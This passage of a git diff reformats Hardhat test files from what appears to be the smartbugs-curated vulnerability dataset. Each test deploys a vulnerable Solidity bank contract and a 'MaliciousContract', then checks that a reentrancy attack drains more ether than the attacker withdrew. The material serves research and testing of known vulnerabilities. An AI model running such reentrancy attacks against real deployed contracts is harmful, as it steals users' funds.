Log.deploy(); + await log.waitForDeployment(); - // Deploy DEP_BANK contract with Log address - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/0xaae1f51cf3339f18b6d3f3bdc75a5facd744b0b8.sol/DEP_BANK.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - DEP_BANK = await ethers.getContractFactory(json.abi, json.bytecode); - victim = await DEP_BANK.deploy(); - await victim.waitForDeployment(); - victim.SetLogFile(log.target); // Set Log address on constructor - - // Deploy MaliciousContract with DEP_BANK address - MaliciousContract = await ethers.getContractFactory("contracts/reentrancy/0xaae1f51cf3339f18b6d3f3bdc75a5facd744b0b8_attack.sol:MaliciousContract"); - hacker = await MaliciousContract.deploy(victim.target); - - }); + // Deploy DEP_BANK contract with Log address + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/0xaae1f51cf3339f18b6d3f3bdc75a5facd744b0b8.sol/DEP_BANK.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + DEP_BANK = await ethers.getContractFactory(json.abi, json.bytecode); + victim = await DEP_BANK.deploy(); + await victim.waitForDeployment(); + victim.SetLogFile(log.target); // Set Log address on constructor - it('sanity check: reentrancy/0xaae1f51cf3339f18b6d3f3bdc75a5facd744b0b8.sol', async function () { - await expect(victim.Deposit({ value: ethers.parseEther("10") })).to.not.be.reverted; - expect(await ethers.provider.getBalance(victim.target)).to.equal(ethers.parseEther("10")); - await expect(victim.Collect(ethers.parseEther("10"))).to.not.be.reverted; - expect(await ethers.provider.getBalance(victim.target)).to.equal(0); - }); + // Deploy MaliciousContract with DEP_BANK address + MaliciousContract = await ethers.getContractFactory( + "contracts/reentrancy/0xaae1f51cf3339f18b6d3f3bdc75a5facd744b0b8_attack.sol:MaliciousContract", + ); + hacker = await MaliciousContract.deploy(victim.target); + }); - it("should successfully drain funds through reentrancy attack", async function () { - // Initial deposit to victim contract - await victim.Deposit( {value: ethers.parseEther("5") }); + it("sanity check: reentrancy/0xaae1f51cf3339f18b6d3f3bdc75a5facd744b0b8.sol", async function () { + await expect(victim.Deposit({ value: ethers.parseEther("10") })).to.not.be + .reverted; + expect(await ethers.provider.getBalance(victim.target)).to.equal( + ethers.parseEther("10"), + ); + await expect(victim.Collect(ethers.parseEther("10"))).to.not.be.reverted; + expect(await ethers.provider.getBalance(victim.target)).to.equal(0); + }); - const victimInitialBalance = await ethers.provider.getBalance(victim.target); - expect(victimInitialBalance).to.equal(ethers.parseEther("5")); + it("should successfully drain funds through reentrancy attack", async function () { + // Initial deposit to victim contract + await victim.Deposit({ value: ethers.parseEther("5") }); + const victimInitialBalance = await ethers.provider.getBalance( + victim.target, + ); + expect(victimInitialBalance).to.equal(ethers.parseEther("5")); - // Initial deposit from maliciousContract on victim contract - await hacker.deposit({value: ethers.parseEther("4")}); + // Initial deposit from maliciousContract on victim contract + await hacker.deposit({ value: ethers.parseEther("4") }); - + const victimBalanceAfterDeposit = await ethers.provider.getBalance( + victim.target, + ); + expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("9")); - const victimBalanceAfterDeposit = await ethers.provider.getBalance(victim.target); - expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("9")); + // Set hacker balance to 0 + await network.provider.send("hardhat_setBalance", [hacker.target, "0x0"]); + let hackerBalance = await ethers.provider.getBalance(hacker.target); + expect(hackerBalance).to.equal(0); - // Set hacker balance to 0 - await network.provider.send("hardhat_setBalance", [ - hacker.target, - "0x0", - ]); - let hackerBalance = await ethers.provider.getBalance(hacker.target); - expect(hackerBalance).to.equal(0); + // Perform reentrancy attack through MaliciousContract + await hacker.attack(ethers.parseEther("3")); - // Perform reentrancy attack through MaliciousContract - await hacker.attack( ethers.parseEther("3")); + // Check balances after attack + const victimBalance = await ethers.provider.getBalance(victim.target); + const maliciousContractBalance = await ethers.provider.getBalance( + hacker.target, + ); - - // Check balances after attack - const victimBalance = await ethers.provider.getBalance(victim.target); - const maliciousContractBalance = await ethers.provider.getBalance(hacker.target); + // Verify the attack was successful - // Verify the attack was successful - - // victim has lost more funds than the withdrawal - expect(victimBalance).to.be.below(ethers.parseEther("6")); + // victim has lost more funds than the withdrawal + expect(victimBalance).to.be.below(ethers.parseEther("6")); - // hacker has more than the withdrawal - expect(maliciousContractBalance).to.be.above(ethers.parseEther("3")); - - }); - }); - \ No newline at end of file + // hacker has more than the withdrawal + expect(maliciousContractBalance).to.be.above(ethers.parseEther("3")); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/reentrancy/0xb5e1b1ee15c6fa0e48fce100125569d430f1bd12_test.js b/smartbugs-curated/0.4.x/test/reentrancy/0xb5e1b1ee15c6fa0e48fce100125569d430f1bd12_test.js index 8e7cc59..8f26155 100644 --- a/smartbugs-curated/0.4.x/test/reentrancy/0xb5e1b1ee15c6fa0e48fce100125569d430f1bd12_test.js +++ b/smartbugs-curated/0.4.x/test/reentrancy/0xb5e1b1ee15c6fa0e48fce100125569d430f1bd12_test.js @@ -2,81 +2,88 @@ const { expect } = require("chai"); const { ethers } = require("hardhat"); const path = require("path"); const fs = require("fs"); -describe("Reentrancy Attack for 0xb5e1b1ee15c6fa0e48fce100125569d430f1bd12.sol", function () { - let Private_Bank; - let victim; - let MaliciousContract; - let hacker; - let Log; - let log; +describe("Reentrancy Attack for 0xb5e1b1ee15c6fa0e48fce100125569d430f1bd12.sol", function () { + let Private_Bank; + let victim; + let MaliciousContract; + let hacker; + let Log; + let log; - beforeEach(async function () { - // Deploy Log contract - const logPath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/0xb5e1b1ee15c6fa0e48fce100125569d430f1bd12.sol/Log.json'); - const logJson = JSON.parse(fs.readFileSync(logPath)); - Log = await ethers.getContractFactory(logJson.abi, logJson.bytecode); - log = await Log.deploy(); - await log.waitForDeployment(); + beforeEach(async function () { + // Deploy Log contract + const logPath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/0xb5e1b1ee15c6fa0e48fce100125569d430f1bd12.sol/Log.json", + ); + const logJson = JSON.parse(fs.readFileSync(logPath)); + Log = await ethers.getContractFactory(logJson.abi, logJson.bytecode); + log = await Log.deploy(); + await log.waitForDeployment(); - // Deploy Private_Bank contract with Log address - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/0xb5e1b1ee15c6fa0e48fce100125569d430f1bd12.sol/Private_Bank.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - Private_Bank = await ethers.getContractFactory(json.abi, json.bytecode); - victim = await Private_Bank.deploy(log.target); - await victim.waitForDeployment(); - //await victim.setLog(log.target); // Set Log address after deployment + // Deploy Private_Bank contract with Log address + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/0xb5e1b1ee15c6fa0e48fce100125569d430f1bd12.sol/Private_Bank.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + Private_Bank = await ethers.getContractFactory(json.abi, json.bytecode); + victim = await Private_Bank.deploy(log.target); + await victim.waitForDeployment(); + //await victim.setLog(log.target); // Set Log address after deployment - // Deploy MaliciousContract with Private_Bank address - MaliciousContract = await ethers.getContractFactory("contracts/reentrancy/0xb5e1b1ee15c6fa0e48fce100125569d430f1bd12_attack.sol:MaliciousContract"); - hacker = await MaliciousContract.deploy(victim.target); - - }); + // Deploy MaliciousContract with Private_Bank address + MaliciousContract = await ethers.getContractFactory( + "contracts/reentrancy/0xb5e1b1ee15c6fa0e48fce100125569d430f1bd12_attack.sol:MaliciousContract", + ); + hacker = await MaliciousContract.deploy(victim.target); + }); - it('sanity check: reentrancy/0xb5e1b1ee15c6fa0e48fce100125569d430f1bd12.sol', async function () { - await expect(victim.Deposit({ value: ethers.parseEther("10") })).to.not.be.reverted; - expect(await ethers.provider.getBalance(victim.target)).to.equal(ethers.parseEther("10")); - await expect(victim.CashOut(ethers.parseEther("10"))).to.not.be.reverted; - expect(await ethers.provider.getBalance(victim.target)).to.equal(0); - }); + it("sanity check: reentrancy/0xb5e1b1ee15c6fa0e48fce100125569d430f1bd12.sol", async function () { + await expect(victim.Deposit({ value: ethers.parseEther("10") })).to.not.be + .reverted; + expect(await ethers.provider.getBalance(victim.target)).to.equal( + ethers.parseEther("10"), + ); + await expect(victim.CashOut(ethers.parseEther("10"))).to.not.be.reverted; + expect(await ethers.provider.getBalance(victim.target)).to.equal(0); + }); - it("should successfully drain funds through reentrancy attack", async function () { - // Initial deposit to victim contract - await victim.Deposit( {value: ethers.parseEther("5") }); + it("should successfully drain funds through reentrancy attack", async function () { + // Initial deposit to victim contract + await victim.Deposit({ value: ethers.parseEther("5") }); - const victimInitialBalance = await ethers.provider.getBalance(victim.target); - expect(victimInitialBalance).to.equal(ethers.parseEther("5")); + const victimInitialBalance = await ethers.provider.getBalance( + victim.target, + ); + expect(victimInitialBalance).to.equal(ethers.parseEther("5")); + // Initial deposit from hacker on victim contract + await hacker.deposit({ value: ethers.parseEther("2") }); - // Initial deposit from hacker on victim contract - await hacker.deposit({value: ethers.parseEther("2")}); + const victimBalanceAfterDeposit = await ethers.provider.getBalance( + victim.target, + ); + expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("7")); - const victimBalanceAfterDeposit = await ethers.provider.getBalance(victim.target); - expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("7")); + // Set hacker balance to 0 + await network.provider.send("hardhat_setBalance", [hacker.target, "0x0"]); + let hackerBalance = await ethers.provider.getBalance(hacker.target); + expect(hackerBalance).to.equal(0); - // Set hacker balance to 0 - await network.provider.send("hardhat_setBalance", [ - hacker.target, - "0x0", - ]); - let hackerBalance = await ethers.provider.getBalance(hacker.target); - expect(hackerBalance).to.equal(0); + // Perform reentrancy attack through MaliciousContract + await hacker.attack(ethers.parseEther("2")); + // Check balances after attack + const victimBalance = await ethers.provider.getBalance(victim.target); + hackerBalance = await ethers.provider.getBalance(hacker.target); - // Perform reentrancy attack through MaliciousContract - await hacker.attack(ethers.parseEther("2")); - - // Check balances after attack - const victimBalance = await ethers.provider.getBalance(victim.target); - hackerBalance = await ethers.provider.getBalance(hacker.target); + // Verify the attack was successful - // Verify the attack was successful - - // victim has lost more funds than the withdrawal - expect(victimBalance).to.be.below(ethers.parseEther("5")); + // victim has lost more funds than the withdrawal + expect(victimBalance).to.be.below(ethers.parseEther("5")); - // hacker has more than the withdrawal - expect(hackerBalance).to.be.above(ethers.parseEther("2")); - - }); - }); - \ No newline at end of file + // hacker has more than the withdrawal + expect(hackerBalance).to.be.above(ethers.parseEther("2")); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/reentrancy/0xb93430ce38ac4a6bb47fb1fc085ea669353fd89e_test.js b/smartbugs-curated/0.4.x/test/reentrancy/0xb93430ce38ac4a6bb47fb1fc085ea669353fd89e_test.js index 3cf3cc5..47bd833 100644 --- a/smartbugs-curated/0.4.x/test/reentrancy/0xb93430ce38ac4a6bb47fb1fc085ea669353fd89e_test.js +++ b/smartbugs-curated/0.4.x/test/reentrancy/0xb93430ce38ac4a6bb47fb1fc085ea669353fd89e_test.js @@ -2,81 +2,88 @@ const { expect } = require("chai"); const { ethers } = require("hardhat"); const path = require("path"); const fs = require("fs"); -describe("Reentrancy Attack for 0xb93430ce38ac4a6bb47fb1fc085ea669353fd89e.sol", function () { - let PrivateBank; - let victim; - let MaliciousContract; - let hacker; - let Log; - let log; +describe("Reentrancy Attack for 0xb93430ce38ac4a6bb47fb1fc085ea669353fd89e.sol", function () { + let PrivateBank; + let victim; + let MaliciousContract; + let hacker; + let Log; + let log; - beforeEach(async function () { - // Deploy Log contract - const logPath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/0xb93430ce38ac4a6bb47fb1fc085ea669353fd89e.sol/Log.json'); - const logJson = JSON.parse(fs.readFileSync(logPath)); - Log = await ethers.getContractFactory(logJson.abi, logJson.bytecode); - log = await Log.deploy(); - await log.waitForDeployment(); + beforeEach(async function () { + // Deploy Log contract + const logPath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/0xb93430ce38ac4a6bb47fb1fc085ea669353fd89e.sol/Log.json", + ); + const logJson = JSON.parse(fs.readFileSync(logPath)); + Log = await ethers.getContractFactory(logJson.abi, logJson.bytecode); + log = await Log.deploy(); + await log.waitForDeployment(); - // Deploy PrivateBank contract with Log address - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/0xb93430ce38ac4a6bb47fb1fc085ea669353fd89e.sol/PrivateBank.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - PrivateBank = await ethers.getContractFactory(json.abi, json.bytecode); - victim = await PrivateBank.deploy(log.target); - await victim.waitForDeployment(); - //await victim.setLog(log.target); // Set Log address after deployment + // Deploy PrivateBank contract with Log address + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/0xb93430ce38ac4a6bb47fb1fc085ea669353fd89e.sol/PrivateBank.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + PrivateBank = await ethers.getContractFactory(json.abi, json.bytecode); + victim = await PrivateBank.deploy(log.target); + await victim.waitForDeployment(); + //await victim.setLog(log.target); // Set Log address after deployment - // Deploy MaliciousContract with PrivateBank address - MaliciousContract = await ethers.getContractFactory("contracts/reentrancy/0xb93430ce38ac4a6bb47fb1fc085ea669353fd89e_attack.sol:MaliciousContract"); - hacker = await MaliciousContract.deploy(victim.target); - - }); + // Deploy MaliciousContract with PrivateBank address + MaliciousContract = await ethers.getContractFactory( + "contracts/reentrancy/0xb93430ce38ac4a6bb47fb1fc085ea669353fd89e_attack.sol:MaliciousContract", + ); + hacker = await MaliciousContract.deploy(victim.target); + }); - it('sanity check: reentrancy/0xb93430ce38ac4a6bb47fb1fc085ea669353fd89e.sol', async function () { - await expect(victim.Deposit({ value: ethers.parseEther("10") })).to.not.be.reverted; - expect(await ethers.provider.getBalance(victim.target)).to.equal(ethers.parseEther("10")); - await expect(victim.CashOut(ethers.parseEther("10"))).to.not.be.reverted; - expect(await ethers.provider.getBalance(victim.target)).to.equal(0); - }); + it("sanity check: reentrancy/0xb93430ce38ac4a6bb47fb1fc085ea669353fd89e.sol", async function () { + await expect(victim.Deposit({ value: ethers.parseEther("10") })).to.not.be + .reverted; + expect(await ethers.provider.getBalance(victim.target)).to.equal( + ethers.parseEther("10"), + ); + await expect(victim.CashOut(ethers.parseEther("10"))).to.not.be.reverted; + expect(await ethers.provider.getBalance(victim.target)).to.equal(0); + }); - it("should successfully drain funds through reentrancy attack", async function () { - // Initial deposit to victim contract - await victim.Deposit( {value: ethers.parseEther("5") }); + it("should successfully drain funds through reentrancy attack", async function () { + // Initial deposit to victim contract + await victim.Deposit({ value: ethers.parseEther("5") }); - const victimInitialBalance = await ethers.provider.getBalance(victim.target); - expect(victimInitialBalance).to.equal(ethers.parseEther("5")); + const victimInitialBalance = await ethers.provider.getBalance( + victim.target, + ); + expect(victimInitialBalance).to.equal(ethers.parseEther("5")); + // Initial deposit from hacker on victim contract + await hacker.deposit({ value: ethers.parseEther("2") }); - // Initial deposit from hacker on victim contract - await hacker.deposit({value: ethers.parseEther("2")}); + const victimBalanceAfterDeposit = await ethers.provider.getBalance( + victim.target, + ); + expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("7")); - const victimBalanceAfterDeposit = await ethers.provider.getBalance(victim.target); - expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("7")); + // Set hacker balance to 0 + await network.provider.send("hardhat_setBalance", [hacker.target, "0x0"]); + let hackerBalance = await ethers.provider.getBalance(hacker.target); + expect(hackerBalance).to.equal(0); - // Set hacker balance to 0 - await network.provider.send("hardhat_setBalance", [ - hacker.target, - "0x0", - ]); - let hackerBalance = await ethers.provider.getBalance(hacker.target); - expect(hackerBalance).to.equal(0); + // Perform reentrancy attack through MaliciousContract + await hacker.attack(ethers.parseEther("1")); + // Check balances after attack + const victimBalance = await ethers.provider.getBalance(victim.target); + hackerBalance = await ethers.provider.getBalance(hacker.target); - // Perform reentrancy attack through MaliciousContract - await hacker.attack(ethers.parseEther("1")); - - // Check balances after attack - const victimBalance = await ethers.provider.getBalance(victim.target); - hackerBalance = await ethers.provider.getBalance(hacker.target); + // Verify the attack was successful - // Verify the attack was successful - - // victim has lost more funds than the withdrawal - expect(victimBalance).to.be.below(ethers.parseEther("6")); + // victim has lost more funds than the withdrawal + expect(victimBalance).to.be.below(ethers.parseEther("6")); - // hacker has more than the withdrawal - expect(hackerBalance).to.be.above(ethers.parseEther("1")); - - }); - }); - \ No newline at end of file + // hacker has more than the withdrawal + expect(hackerBalance).to.be.above(ethers.parseEther("1")); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/reentrancy/0xbaf51e761510c1a11bf48dd87c0307ac8a8c8a4f_test.js b/smartbugs-curated/0.4.x/test/reentrancy/0xbaf51e761510c1a11bf48dd87c0307ac8a8c8a4f_test.js index dcdafdd..5a32bd2 100644 --- a/smartbugs-curated/0.4.x/test/reentrancy/0xbaf51e761510c1a11bf48dd87c0307ac8a8c8a4f_test.js +++ b/smartbugs-curated/0.4.x/test/reentrancy/0xbaf51e761510c1a11bf48dd87c0307ac8a8c8a4f_test.js @@ -2,81 +2,90 @@ const { expect } = require("chai"); const { ethers } = require("hardhat"); const path = require("path"); const fs = require("fs"); -describe("Reentrancy Attack for 0xbaf51e761510c1a11bf48dd87c0307ac8a8c8a4f.sol", function () { - let ETH_VAULT; - let victim; - let MaliciousContract; - let hacker; - let Log; - let log; +describe("Reentrancy Attack for 0xbaf51e761510c1a11bf48dd87c0307ac8a8c8a4f.sol", function () { + let ETH_VAULT; + let victim; + let MaliciousContract; + let hacker; + let Log; + let log; - beforeEach(async function () { - // Deploy Log contract - const logPath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/0xbaf51e761510c1a11bf48dd87c0307ac8a8c8a4f.sol/Log.json'); - const logJson = JSON.parse(fs.readFileSync(logPath)); - Log = await ethers.getContractFactory(logJson.abi, logJson.bytecode); - log = await Log.deploy(); - await log.waitForDeployment(); + beforeEach(async function () { + // Deploy Log contract + const logPath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/0xbaf51e761510c1a11bf48dd87c0307ac8a8c8a4f.sol/Log.json", + ); + const logJson = JSON.parse(fs.readFileSync(logPath)); + Log = await ethers.getContractFactory(logJson.abi, logJson.bytecode); + log = await Log.deploy(); + await log.waitForDeployment(); - // Deploy ETH_VAULT contract with Log address - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/0xbaf51e761510c1a11bf48dd87c0307ac8a8c8a4f.sol/ETH_VAULT.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - ETH_VAULT = await ethers.getContractFactory(json.abi, json.bytecode); - victim = await ETH_VAULT.deploy(log.target); - await victim.waitForDeployment(); - //await victim.setLog(log.target); // Set Log address after deployment + // Deploy ETH_VAULT contract with Log address + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/0xbaf51e761510c1a11bf48dd87c0307ac8a8c8a4f.sol/ETH_VAULT.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + ETH_VAULT = await ethers.getContractFactory(json.abi, json.bytecode); + victim = await ETH_VAULT.deploy(log.target); + await victim.waitForDeployment(); + //await victim.setLog(log.target); // Set Log address after deployment - // Deploy MaliciousContract with ETH_VAULT address - MaliciousContract = await ethers.getContractFactory("contracts/reentrancy/0xbaf51e761510c1a11bf48dd87c0307ac8a8c8a4f_attack.sol:MaliciousContract"); - hacker = await MaliciousContract.deploy(victim.target); - - }); + // Deploy MaliciousContract with ETH_VAULT address + MaliciousContract = await ethers.getContractFactory( + "contracts/reentrancy/0xbaf51e761510c1a11bf48dd87c0307ac8a8c8a4f_attack.sol:MaliciousContract", + ); + hacker = await MaliciousContract.deploy(victim.target); + }); - it('sanity check: reentrancy/0xbaf51e761510c1a11bf48dd87c0307ac8a8c8a4f.sol', async function () { - await expect(victim.Deposit({ value: ethers.parseEther("10") })).to.not.be.reverted; - expect(await ethers.provider.getBalance(victim.target)).to.equal(ethers.parseEther("10")); - await expect(victim.CashOut(ethers.parseEther("10"))).to.not.be.reverted; - expect(await ethers.provider.getBalance(victim.target)).to.equal(ethers.parseEther("0")); - }); + it("sanity check: reentrancy/0xbaf51e761510c1a11bf48dd87c0307ac8a8c8a4f.sol", async function () { + await expect(victim.Deposit({ value: ethers.parseEther("10") })).to.not.be + .reverted; + expect(await ethers.provider.getBalance(victim.target)).to.equal( + ethers.parseEther("10"), + ); + await expect(victim.CashOut(ethers.parseEther("10"))).to.not.be.reverted; + expect(await ethers.provider.getBalance(victim.target)).to.equal( + ethers.parseEther("0"), + ); + }); - it("should successfully drain funds through reentrancy attack", async function () { - // Initial deposit to victim contract - await victim.Deposit( {value: ethers.parseEther("4") }); + it("should successfully drain funds through reentrancy attack", async function () { + // Initial deposit to victim contract + await victim.Deposit({ value: ethers.parseEther("4") }); - const victimInitialBalance = await ethers.provider.getBalance(victim.target); - expect(victimInitialBalance).to.equal(ethers.parseEther("4")); + const victimInitialBalance = await ethers.provider.getBalance( + victim.target, + ); + expect(victimInitialBalance).to.equal(ethers.parseEther("4")); + // Initial deposit from hacker on victim contract + await hacker.deposit({ value: ethers.parseEther("5") }); - // Initial deposit from hacker on victim contract - await hacker.deposit({value: ethers.parseEther("5")}); + const victimBalanceAfterDeposit = await ethers.provider.getBalance( + victim.target, + ); + expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("9")); - const victimBalanceAfterDeposit = await ethers.provider.getBalance(victim.target); - expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("9")); + // Set hacker balance to 0 + await network.provider.send("hardhat_setBalance", [hacker.target, "0x0"]); + let hackerBalance = await ethers.provider.getBalance(hacker.target); + expect(hackerBalance).to.equal(0); - // Set hacker balance to 0 - await network.provider.send("hardhat_setBalance", [ - hacker.target, - "0x0", - ]); - let hackerBalance = await ethers.provider.getBalance(hacker.target); - expect(hackerBalance).to.equal(0); + // Perform reentrancy attack through MaliciousContract + await hacker.attack(ethers.parseEther("3")); + // Check balances after attack + const victimBalance = await ethers.provider.getBalance(victim.target); + hackerBalance = await ethers.provider.getBalance(hacker.target); - // Perform reentrancy attack through MaliciousContract - await hacker.attack(ethers.parseEther("3")); - - // Check balances after attack - const victimBalance = await ethers.provider.getBalance(victim.target); - hackerBalance = await ethers.provider.getBalance(hacker.target); + // Verify the attack was successful - // Verify the attack was successful - - // victim has lost more funds than the withdrawal - expect(victimBalance).to.be.below(ethers.parseEther("6")); + // victim has lost more funds than the withdrawal + expect(victimBalance).to.be.below(ethers.parseEther("6")); - // hacker has more than the withdrawal - expect(hackerBalance).to.be.above(ethers.parseEther("3")); - - }); - }); - \ No newline at end of file + // hacker has more than the withdrawal + expect(hackerBalance).to.be.above(ethers.parseEther("3")); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/reentrancy/0xbe4041d55db380c5ae9d4a9b9703f1ed4e7e3888_test.js b/smartbugs-curated/0.4.x/test/reentrancy/0xbe4041d55db380c5ae9d4a9b9703f1ed4e7e3888_test.js index 6ba023b..2c11e0c 100644 --- a/smartbugs-curated/0.4.x/test/reentrancy/0xbe4041d55db380c5ae9d4a9b9703f1ed4e7e3888_test.js +++ b/smartbugs-curated/0.4.x/test/reentrancy/0xbe4041d55db380c5ae9d4a9b9703f1ed4e7e3888_test.js @@ -12,70 +12,80 @@ describe("Reentrancy Attack for 0xbe4041d55db380c5ae9d4a9b9703f1ed4e7e3888.sol", beforeEach(async function () { // Deploy Log contract - const logPath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/0xbe4041d55db380c5ae9d4a9b9703f1ed4e7e3888.sol/Log.json'); + const logPath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/0xbe4041d55db380c5ae9d4a9b9703f1ed4e7e3888.sol/Log.json", + ); const logJson = JSON.parse(fs.readFileSync(logPath)); Log = await ethers.getContractFactory(logJson.abi, logJson.bytecode); log = await Log.deploy(); await log.waitForDeployment(); // Deploy MONEY_BOX contract with Log address - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/0xbe4041d55db380c5ae9d4a9b9703f1ed4e7e3888.sol/MONEY_BOX.json'); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/0xbe4041d55db380c5ae9d4a9b9703f1ed4e7e3888.sol/MONEY_BOX.json", + ); const json = JSON.parse(fs.readFileSync(codePath)); MONEY_BOX = await ethers.getContractFactory(json.abi, json.bytecode); victim = await MONEY_BOX.deploy(); await victim.waitForDeployment(); - victim.SetLogFile(log.target) - + victim.SetLogFile(log.target); + // Deploy MaliciousContract with MONEY_BOX address - MaliciousContract = await ethers.getContractFactory("contracts/reentrancy/0xbe4041d55db380c5ae9d4a9b9703f1ed4e7e3888_attack.sol:MaliciousContract"); + MaliciousContract = await ethers.getContractFactory( + "contracts/reentrancy/0xbe4041d55db380c5ae9d4a9b9703f1ed4e7e3888_attack.sol:MaliciousContract", + ); hacker = await MaliciousContract.deploy(victim.target); - }); - it('sanity check: reentrancy/0xbe4041d55db380c5ae9d4a9b9703f1ed4e7e3888.sol', async function () { - await expect(victim.Put(0, { value: ethers.parseEther("10") })).to.not.be.reverted; - expect(await ethers.provider.getBalance(victim.target)).to.equal(ethers.parseEther("10")); + it("sanity check: reentrancy/0xbe4041d55db380c5ae9d4a9b9703f1ed4e7e3888.sol", async function () { + await expect(victim.Put(0, { value: ethers.parseEther("10") })).to.not.be + .reverted; + expect(await ethers.provider.getBalance(victim.target)).to.equal( + ethers.parseEther("10"), + ); await expect(victim.Collect(ethers.parseEther("10"))).to.not.be.reverted; expect(await ethers.provider.getBalance(victim.target)).to.equal(0); }); it("should successfully drain funds through reentrancy attack", async function () { // Initial deposit to victim contract - await victim.Put( 0, {value: ethers.parseEther("5") }); - - const victimInitialBalance = await ethers.provider.getBalance(victim.target); - expect(victimInitialBalance).to.equal(ethers.parseEther("5")); + await victim.Put(0, { value: ethers.parseEther("5") }); + const victimInitialBalance = await ethers.provider.getBalance( + victim.target, + ); + expect(victimInitialBalance).to.equal(ethers.parseEther("5")); // Initial deposit from maliciousContract on victim contract - await hacker.deposit({value: ethers.parseEther("5")}); + await hacker.deposit({ value: ethers.parseEther("5") }); - const victimBalanceAfterDeposit = await ethers.provider.getBalance(victim.target); - expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("10")); + const victimBalanceAfterDeposit = await ethers.provider.getBalance( + victim.target, + ); + expect(victimBalanceAfterDeposit).to.equal(ethers.parseEther("10")); //set hacker balance to 0 - await network.provider.send("hardhat_setBalance", [ - hacker.target, - "0x0", - ]); + await network.provider.send("hardhat_setBalance", [hacker.target, "0x0"]); let hackerBalance = await ethers.provider.getBalance(hacker.target); expect(hackerBalance).to.equal(0); // Perform reentrancy attack through MaliciousContract - await hacker.attack( ethers.parseEther("3")); + await hacker.attack(ethers.parseEther("3")); - // Check balances after attack const victimBalance = await ethers.provider.getBalance(victim.target); - const maliciousContractBalance = await ethers.provider.getBalance(hacker.target); + const maliciousContractBalance = await ethers.provider.getBalance( + hacker.target, + ); // Verify the attack was successful - + // victim has lost more funds than the withdrawal - expect(victimBalance).to.be.below(ethers.parseEther("7")); + expect(victimBalance).to.be.below(ethers.parseEther("7")); - // hacker has more than the withdrawal + // hacker has more than the withdrawal expect(maliciousContractBalance).to.be.above(ethers.parseEther("3")); - }); }); diff --git a/smartbugs-curated/0.4.x/test/reentrancy/0xcead721ef5b11f1a7b530171aab69b16c5e66b6e_test.js b/smartbugs-curated/0.4.x/test/reentrancy/0xcead721ef5b11f1a7b530171aab69b16c5e66b6e_test.js index 338a596..812d288 100644 --- a/smartbugs-curated/0.4.x/test/reentrancy/0xcead721ef5b11f1a7b530171aab69b16c5e66b6e_test.js +++ b/smartbugs-curated/0.4.x/test/reentrancy/0xcead721ef5b11f1a7b530171aab69b16c5e66b6e_test.js @@ -12,69 +12,79 @@ describe("Reentrancy Attack for 0xcead721ef5b11f1a7b530171aab69b16c5e66b6e.sol", beforeEach(async function () { // Deploy Log contract - const logPath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/0xcead721ef5b11f1a7b530171aab69b16c5e66b6e.sol/Log.json'); + const logPath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/0xcead721ef5b11f1a7b530171aab69b16c5e66b6e.sol/Log.json", + ); const logJson = JSON.parse(fs.readFileSync(logPath)); Log = await ethers.getContractFactory(logJson.abi, logJson.bytecode); log = await Log.deploy(); await log.waitForDeployment(); // Deploy WALLET contract with Log address - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/reentrancy/0xcead721ef5b11f1a7b530171aab69b16c5e66b6e.sol/WALLET.json'); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/reentrancy/0xcead721ef5b11f1a7b530171aab69b16c5e66b6e.sol/WALLET.json", + ); const json = JSON.parse(fs.readFileSync(codePath)); WALLET = await ethers.getContractFactory(json.abi, json.bytecode); victim = await WALLET.deploy(log.target); await victim.waitForDeployment(); - + // Deploy MaliciousContract with WALLET address - MaliciousContract = await ethers.getContractFactory("contracts/reentrancy/0xcead721ef5b11f1a7b530171aab69b16c5e66b6e_attack.sol:MaliciousContract"); + MaliciousContract = await ethers.getContractFactory( + "contracts/reentrancy/0xcead721ef5b11f1a7b530171aab69b16c5e66b6e_attack.sol:MaliciousContract", + ); hacker = await MaliciousContract.deploy(victim.target); - }); - it('sanity check: reentrancy/0xcead721ef5b11f1a7b530171aab69b16c5e66b6e.sol', async function () { - await expect(victim.Put(0, { value: ethers.parseEther('10') })).to.not.be.reverted; - expect(await ethers.provider.getBalance(victim.target)).to.equal(ethers.parseEther("10")); - await 